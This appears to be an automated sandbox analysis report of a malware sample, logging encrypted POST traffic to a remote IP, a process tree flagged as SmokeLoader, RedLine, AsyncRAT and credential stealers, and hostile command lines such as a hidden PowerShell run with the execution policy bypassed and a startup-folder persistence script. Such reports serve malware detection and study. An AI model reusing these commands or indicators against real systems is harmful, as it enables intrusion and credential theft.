                                                                                    2024-07-24 17:59:08 UTC685INData Raw: 45 49 6d 7a 45 51 4f 63 6f 69 43 30 64 6f 34 4e 4c 41 74 5a 41 6b 74 6f 47 6e 48 33 6a 30 46 4b 54 54 73 6e 79 58 45 4d 6c 46 66 45 4b 70 4d 31 2b 79 4a 4a 79 6d 42 54 43 6d 49 36 76 45 4d 49 36 53 41 45 37 71 48 76 79 53 6e 50 47 6e 66 55 43 52 54 52 2f 5a 53 32 39 43 71 53 4e 66 58 33 77 58 4c 61 6c 74 75 65 4b 66 50 54 44 44 76 72 43 2b 66 44 63 42 34 4f 53 6e 30 62 79 4d 57 50 55 4b 74 4b 73 53 45 46 30 77 44 6d 31 35 49 51 49 51 79 47 72 52 52 61 71 72 75 5a 2f 48 4e 56 55 6d 70 46 61 61 6d 70 32 6a 46 30 6e 50 43 54 44 39 74 59 6f 6e 34 6f 42 50 39 2b 6a 38 63 35 45 63 49 4a 73 7a 4f 48 58 65 5a 62 45 6c 76 78 79 49 4f 67 6a 64 68 47 44 74 57 4a 41 71 2b 58 77 71 45 6a 6d 32 78 67 44 48 45 77 39 4c 34 56 58 48 71 53 7a 59 79 33 52 57 51 4e 49 4a 68
                                                                                    Data Ascii: EImzEQOcoiC0do4NLAtZAktoGnH3j0FKTTsnyXEMlFfEKpM1+yJJymBTCmI6vEMI6SAE7qHvySnPGnfUCRTR/ZS29CqSNfX3wXLaltueKfPTDDvrC+fDcB4OSn0byMWPUKtKsSEF0wDm15IQIQyGrRRaqruZ/HNVUmpFaamp2jF0nPCTD9tYon4oBP9+j8c5EcIJszOHXeZbElvxyIOgjdhGDtWJAq+XwqEjm2xgDHEw9L4VXHqSzYy3RWQNIJh


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    96192.168.2.1049854107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:59:09 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:59:09 UTC1122OUTData Raw: 67 68 64 72 35 52 4d 73 50 54 4f 7a 76 57 35 35 4f 5a 33 62 59 35 6e 6e 6e 6b 55 4e 68 6b 66 59 4b 68 71 44 6e 32 64 59 4a 73 41 54 58 59 55 52 49 38 2b 46 77 2b 73 45 5a 4b 76 58 58 47 65 59 7a 41 73 79 4c 6d 35 42 2b 2b 32 31 68 54 6f 6d 39 77 42 6f 49 76 66 75 77 56 2b 77 61 2f 64 36 6e 2b 7a 6f 76 59 46 37 52 37 52 56 5a 58 54 4e 34 31 62 48 54 42 74 2f 65 36 53 7a 43 74 62 72 66 43 69 77 79 47 55 61 39 69 36 72 68 73 75 61 46 6d 48 66 35 78 61 5a 4f 65 7a 55 46 55 71 45 76 59 70 6f 6b 32 6c 76 6f 6f 53 76 41 79 6e 6b 59 4f 5a 4c 59 77 2f 4d 6e 64 2b 76 73 35 32 4c 56 36 5a 50 44 6b 47 47 69 77 4b 61 37 48 75 36 56 46 2b 54 59 6e 31 77 34 4c 4f 38 56 64 46 53 67 64 53 34 6f 42 4c 30 30 7a 4e 6f 70 57 6a 49 7a 34 6c 42 33 58 36 76 78 79 34 77 68 41 47
                                                                                    Data Ascii: ghdr5RMsPTOzvW55OZ3bY5nnnkUNhkfYKhqDn2dYJsATXYURI8+Fw+sEZKvXXGeYzAsyLm5B++21hTom9wBoIvfuwV+wa/d6n+zovYF7R7RVZXTN41bHTBt/e6SzCtbrfCiwyGUa9i6rhsuaFmHf5xaZOezUFUqEvYpok2lvooSvAynkYOZLYw/Mnd+vs52LV6ZPDkGGiwKa7Hu6VF+TYn1w4LO8VdFSgdS4oBL00zNopWjIz4lB3X6vxy4whAG
                                                                                    2024-07-24 17:59:10 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:59:10 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:59:10 UTC685INData Raw: 42 5a 36 6b 52 6b 48 6f 58 2f 63 5a 67 6d 6c 39 64 74 75 64 62 75 6e 75 6f 59 36 50 62 31 6e 57 76 57 47 75 44 78 6f 65 6b 46 43 65 73 30 6c 33 76 54 33 65 79 52 4c 62 4b 35 37 67 70 39 4a 34 37 72 76 6f 73 6a 78 79 41 6a 4d 79 42 4d 4e 45 72 52 69 37 67 66 52 74 45 44 78 47 35 6f 6a 4c 64 65 54 35 33 45 49 4e 6f 6e 6d 4b 78 71 69 50 64 41 72 41 34 4d 54 47 76 46 41 52 72 7a 73 32 31 65 49 4f 5a 51 62 37 4a 46 4e 41 62 61 4f 50 79 38 74 31 61 56 45 36 43 6f 57 44 30 63 6c 64 4e 42 38 6a 73 6d 53 74 76 6a 50 2f 45 69 4f 48 66 74 71 38 75 78 58 4a 70 44 4a 30 39 51 47 76 53 31 4c 69 31 73 43 6b 73 51 63 64 57 75 48 77 53 61 52 2b 73 55 74 53 42 4a 34 34 4e 52 76 4d 52 58 6e 42 61 76 50 43 39 75 74 42 7a 68 51 41 4a 2b 4b 72 4d 32 47 54 41 43 42 38 70 57 74
                                                                                    Data Ascii: BZ6kRkHoX/cZgml9dtudbunuoY6Pb1nWvWGuDxoekFCes0l3vT3eyRLbK57gp9J47rvosjxyAjMyBMNErRi7gfRtEDxG5ojLdeT53EINonmKxqiPdArA4MTGvFARrzs21eIOZQb7JFNAbaOPy8t1aVE6CoWD0cldNB8jsmStvjP/EiOHftq8uxXJpDJ09QGvS1Li1sCksQcdWuHwSaR+sUtSBJ44NRvMRXnBavPC9utBzhQAJ+KrM2GTACB8pWt


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:4
                                                                                    Start time:13:55:02
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\Desktop\7Y18r(14).exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\7Y18r(14).exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:186'368 bytes
                                                                                    MD5 hash:779806A66CCCB6B37A02F6B30F7AECF3
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:13:55:02
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    Imagebase:0xba0000
                                                                                    File size:15'872 bytes
                                                                                    MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 92%, ReversingLabs
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:13:55:15
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536
                                                                                    Imagebase:0x2e0000
                                                                                    File size:483'680 bytes
                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:13:55:19
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                    Imagebase:0x7ff609fd0000
                                                                                    File size:5'141'208 bytes
                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:16
                                                                                    Start time:13:55:37
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\ftejced
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\ftejced
                                                                                    Imagebase:0x7ff7df220000
                                                                                    File size:186'368 bytes
                                                                                    MD5 hash:779806A66CCCB6B37A02F6B30F7AECF3
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 95%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:13:55:37
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    Imagebase:0xee0000
                                                                                    File size:15'872 bytes
                                                                                    MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:13:55:43
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
                                                                                    Imagebase:0xd70000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:13:55:43
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:24
                                                                                    Start time:13:56:24
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\F6D9.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\F6D9.exe
                                                                                    Imagebase:0x7ff70b8c0000
                                                                                    File size:988'672 bytes
                                                                                    MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 16%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:25
                                                                                    Start time:13:56:24
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:27
                                                                                    Start time:13:56:38
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\B552.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\B552.exe
                                                                                    Imagebase:0x7ff75ee70000
                                                                                    File size:11'672'576 bytes
                                                                                    MD5 hash:D3785ED170CDB1F4784D3DFF3A61DAE0
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:Go lang
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 0000001B.00000002.2364799277.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\B552.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 50%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:28
                                                                                    Start time:13:56:43
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    Imagebase:0x1c0f2100000
                                                                                    File size:141'944 bytes
                                                                                    MD5 hash:B6A1C0998D0A7979C9EC17B8D5CF8A81
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:30
                                                                                    Start time:13:56:44
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
                                                                                    Imagebase:0x2ac861b0000
                                                                                    File size:141'944 bytes
                                                                                    MD5 hash:B6A1C0998D0A7979C9EC17B8D5CF8A81
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:31
                                                                                    Start time:13:56:49
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    Imagebase:0x320000
                                                                                    File size:231'736 bytes
                                                                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000003.2365862383.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:32
                                                                                    Start time:13:56:53
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                                                                                    Imagebase:0x7ff7b2bb0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:33
                                                                                    Start time:13:56:53
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:35
                                                                                    Start time:13:57:14
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
                                                                                    Imagebase:0x7ff7810c0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:36
                                                                                    Start time:13:57:14
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
                                                                                    Imagebase:0x7ff7810c0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:37
                                                                                    Start time:13:57:14
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"vm.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:40'376 bytes
                                                                                    MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Has exited:false

                                                                                    Target ID:38
                                                                                    Start time:13:57:14
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"lm.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:40'376 bytes
                                                                                    MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000026.00000002.2904757056.0000000003870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2731047551.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2640497026.0000000003118000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000026.00000002.2881701412.0000000000060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2631693692.0000000003115000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2729559730.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Has exited:true

                                                                                    Target ID:40
                                                                                    Start time:13:57:29
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
                                                                                    Imagebase:0x7ff7bca40000
                                                                                    File size:170'496 bytes
                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:41
                                                                                    Start time:13:57:30
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
                                                                                    Imagebase:0x7ff7810c0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:42
                                                                                    Start time:13:57:30
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:43
                                                                                    Start time:13:57:30
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"vm.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:40'376 bytes
                                                                                    MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000002B.00000002.2935972956.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000002B.00000002.2872562883.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Has exited:true

                                                                                    Target ID:46
                                                                                    Start time:13:57:36
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 1124
                                                                                    Imagebase:0x2e0000
                                                                                    File size:483'680 bytes
                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:48
                                                                                    Start time:13:57:40
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 628
                                                                                    Imagebase:0x2e0000
                                                                                    File size:483'680 bytes
                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:49
                                                                                    Start time:13:57:58
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\F6D9.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\F6D9.exe"
                                                                                    Imagebase:0x7ff70b8c0000
                                                                                    File size:988'672 bytes
                                                                                    MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:50
                                                                                    Start time:13:57:58
                                                                                    Start date:24/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:9.7%
                                                                                      Dynamic/Decrypted Code Coverage:28.1%
                                                                                      Signature Coverage:41.5%
                                                                                      Total number of Nodes:171
                                                                                      Total number of Limit Nodes:10
